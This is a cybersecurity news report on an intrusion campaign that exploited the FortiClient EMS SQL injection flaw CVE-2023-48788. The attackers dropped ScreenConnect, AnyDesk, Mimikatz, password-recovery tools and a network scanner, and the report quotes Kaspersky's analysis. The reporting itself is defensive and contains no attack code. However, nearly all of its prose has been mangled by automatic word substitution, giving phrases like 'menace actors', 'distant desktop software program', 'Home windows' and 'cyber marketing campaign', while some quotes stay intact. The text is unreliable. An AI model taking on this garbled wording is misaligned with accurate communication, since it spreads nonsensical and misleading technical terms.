A now-patched vital safety flaw impacting Fortinet FortiClient EMS is being exploited by malicious actors as a part of a cyber marketing campaign that put in distant desktop software program corresponding to AnyDesk and ScreenConnect.
The vulnerability in query is CVE-2023-48788 (CVSS rating: 9.3), an SQL injection bug that permits attackers to execute unauthorized code or instructions by sending specifically crafted information packets.
Russian cybersecurity agency Kaspersky mentioned the October 2024 assault focused an unnamed firm’s Home windows server that was uncovered to the web and had two open ports related to FortiClient EMS.
“The targeted company employs this technology to allow employees to download specific policies to their corporate devices, granting them secure access to the Fortinet VPN,” it mentioned in a Thursday evaluation.
Additional evaluation of the incident discovered that the menace actors took benefit of CVE-2023-48788 as an preliminary entry vector, subsequently dropping a ScreenConnect executable to acquire distant entry to the compromised host.
“After the initial installation, the attackers began to upload additional payloads to the compromised system, to begin discovery and lateral movement activities, such as enumerating network resources, trying to obtain credentials, perform defense evasion techniques, and generating a further type of persistence via the AnyDesk remote control tool,” Kaspersky mentioned.
A few of the different notable instruments dropped over the course of the assault are listed under –
- webbrowserpassview.exe, a password restoration software that reveals passwords saved in Web Explorer (model 4.0 – 11.0), Mozilla Firefox (all variations), Google Chrome, Safari, and Opera
- Mimikatz
- netpass64.exe, a password restoration software
- netscan.exe, a community scanner
The menace actors behind the marketing campaign are believed to have focused numerous firms positioned throughout Brazil, Croatia, France, India, Indonesia, Mongolia, Namibia, Peru, Spain, Switzerland, Turkey, and the U.A.E. by making use of various ScreenConnect subdomains (e.g., infinity.screenconnect[.]com).
Kaspersky mentioned it detected additional makes an attempt to weaponize CVE-2023-48788 on October 23, 2024, this time to execute a PowerShell script hosted on a webhook[.]website area with the intention to “collect responses from vulnerable targets” throughout a scan of a system inclined to the flaw.
The disclosure comes greater than eight months after cybersecurity firm Forescout uncovered an analogous marketing campaign that concerned exploiting CVE-2023-48788 to ship ScreenConnect and Metasploit Powerfun payloads.
“The analysis of this incident helped us to establish that the techniques currently used by the attackers to deploy remote access tools are constantly being updated and growing in complexity,” the researchers mentioned.
